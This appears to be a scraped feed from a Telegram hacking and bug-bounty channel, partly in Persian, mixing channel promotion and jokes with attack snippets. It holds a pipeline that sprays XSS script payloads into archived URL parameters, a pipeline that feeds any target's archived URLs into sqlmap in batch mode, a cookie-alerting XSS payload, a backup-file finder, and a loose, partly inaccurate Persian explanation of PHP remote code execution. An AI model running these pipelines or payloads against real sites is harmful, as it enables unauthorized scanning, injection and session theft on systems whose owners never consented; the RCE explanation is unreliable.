echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' | xsschecker -match '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' -vuln
BugCod3
( ZIP )#XSS #BugBounty
Please open Telegram to view this post
VIEW IN TELEGRAM
SQLMap from Waybackurls ⚰️
#sql #sql_injection
——————
➡️ @EroHack0
🙏 Boost
waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"
#sql #sql_injection
——————
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6🗿3🤯2 1
Payload=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Full_url= https://site. com/?invitedby=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
#XSS #BugBounty
Please open Telegram to view this post
VIEW IN TELEGRAM
خیلی کوتاه یه نکته بگم که احتمالاً ۹۰ درصدتون نمیدونستید
- اگر اشتباهی به جای Shutdown دستتون خورد روی Restart و نمیخواستید منتظر بمونید تا سیستمتون ریاستارت بشه کافیه زمانی که صفحه ریاستارت اومده بود دکمه Esc رو بزنید تا ازش خارج بشید ؛)
🤯5👍3🔥2❤1
🔖Backup Files Finder
😴Github: 🔗Link
#BugBounty #BugBountyTools
🔹 Share & Support Us 🔹
✔️ @EroHack
✔️Boost
A Nuclei template that allows you to search for backup files on your target's website.
😴Github: 🔗Link
#BugBounty #BugBountyTools
🔹 Share & Support Us 🔹
✔️ @EroHack
✔️Boost
👍6🤯2
Eʀᴏ ··ʜᴀᴄᴋ··
یه حمایتمون نشه🥲❤️🫶🏻 https://yangx.top/boost/EroHack0
و تنها در خواستی که دارم از شما کسایی که پریمیوم دارن چنل رو بوست کنن، ماهم از خجالتتون در میام🫶🏻
🔥4🗿2❤1
⚠️To reach the area you want to reach, do three things:
1-Creativity
2- Risk tolerance
3-Doing
♻️Read the tweet now. Click here to see the tweet.
1-Creativity
2- Risk tolerance
3-Doing
♻️Read the tweet now. Click here to see the tweet.
👍4🔥3
🤣6🗿4👎3⚡1
👎10🗿5🤣2👍1
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡8🤯2👎1🗿1
آسیب پذیری Remote Code execution و یا به اختصار RCE یک نوع آسیب پذیری ریموت میباشد .
که به نفوذ گر امکان اجرای دستور دلخواه او را میدهد ، این آسیب پذیری بر اساس یک اشکال برنامه نویسی صورت میگیرد .
در هنگام استفاده از تابع Get در PHP اگر مقدار دریافتی را به درستی تعریف نکنیم با این آسیب پذیری مواجع میشویم . این مقدار میتواند بصورت یک متغیر در برنامه ما باشد . که در صورت بروز مشکل ما میتوانیم یک مقدار بصورت دلخواه به آن وارد کنیم به
تابع set را برای دادن مقدار به متغیرها در برنامه ها و تابع get را برای گرفتن مقدار متغیر ها و نمایش آنها در برنامه ها استفاده میکنیم.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5💯4🔥3
This media is not supported in your browser
VIEW IN TELEGRAM
بدون شرح...
دیس ایز کیبورد🤡
دیس ایز کیبورد
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣7🗿3